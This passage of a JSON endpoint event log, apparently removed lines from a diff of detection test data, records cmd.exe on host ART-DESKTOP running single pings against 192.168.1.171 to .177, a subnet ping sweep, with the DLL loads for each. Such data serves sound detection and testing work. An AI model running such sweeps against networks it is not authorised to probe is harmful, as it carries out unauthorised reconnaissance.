"C:\\Windows\\System32\\msvcrt.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "process", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572821830000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.171", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5116, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5116, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "process", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572826830000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.172", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3896, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "process", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572831990000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.173", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7468, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "process", - 
"pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572836830000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.174", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2960, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572836970000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - 
"unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "process", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572841990000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.175", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5244, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": 
"{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "process", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572846990000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.176", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6488, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "event_type": "process", - "pid": 6488, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572851830000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.177", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5428, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - 
